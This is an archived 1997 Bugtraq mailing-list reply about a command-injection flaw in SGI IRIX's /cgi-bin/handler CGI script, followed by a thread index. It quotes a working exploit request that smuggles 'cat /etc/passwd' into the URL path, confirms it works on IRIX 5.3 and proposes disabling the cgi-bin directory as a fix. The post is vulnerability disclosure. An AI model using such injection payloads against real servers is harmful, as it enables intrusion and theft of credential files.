Bugtraq mailing list archives
Re: Bug in SGI's /cgi-bin/handler
From: yarony () vipe technion ac il (Yaron Yanay)
Date: Sun, 15 Jun 1997 13:49:01 +0300
On Sun, 15 Jun 1997, Razvan Dragomirescu wrote: :The way to exploit this "feature" for cgi-bin/handler is: :telnet target.machine.com 80 :GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download :HTTP/1.0 :I tested it on two Indy machines with IRIX 6.2. I would appreciate any :feedback from you. It worked on my IRIX 5.3 machines. my fix: chmod 0 /var/www/cgi-bin Yaron. \\\|/// \\ - - // ( @ @ ) +-----------------------oOOo-(_)-oOOo-------------+ | Yaron Yanay. email:yarony () yarony il eu org | | yarony () tx technion ac il | | http://www.technion.ac.il/~yarony | | http://yarony.il.eu.org | +-------------------------------Oooo--------------+ oooO ( ) ( ) ) / \ ( (_/ \_)
Current thread:
- qmail-dos-2.c, another denial of service attack, (continued)
- qmail-dos-2.c, another denial of service attack Frank DENIS -Jedi/Sector One- (Jun 11)
- DNS abuse Jordi Murgo (Jun 11)
- Solaris x86 buffer overflows jim bresler (Jun 12)
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program Aleph One (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program The Nolander (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Thomas Koenig (Jun 14)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Adam Morrison (Jun 15)
- Netscape Exploit root (Jun 14)
- Bug in SGI's /cgi-bin/handler Razvan Dragomirescu (Jun 14)
- Re: Bug in SGI's /cgi-bin/handler Yaron Yanay (Jun 15)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- sendmail 8.8.6 released Eric Allman (Jun 14)
- Re: Netscape Exploit Roger Espel Llima (Jun 14)
- Re: Netscape Exploit Micah Brandon (Jun 14)
- Re: Netscape Exploit Manoj Kasichainula (Jun 15)
- rshd gives away usernames David Holland (Jun 13)
- Re: rshd gives away usernames Erik Troan (Jun 13)
- Re: rshd gives away usernames Eric (Jun 13)
- Re: rshd gives away usernames Todd C. Miller (Jun 13)
- Re: rshd gives away usernames Alan Brown (Jun 14)
- Changing default UMASK for all daemons Dax Kelson (Jun 13)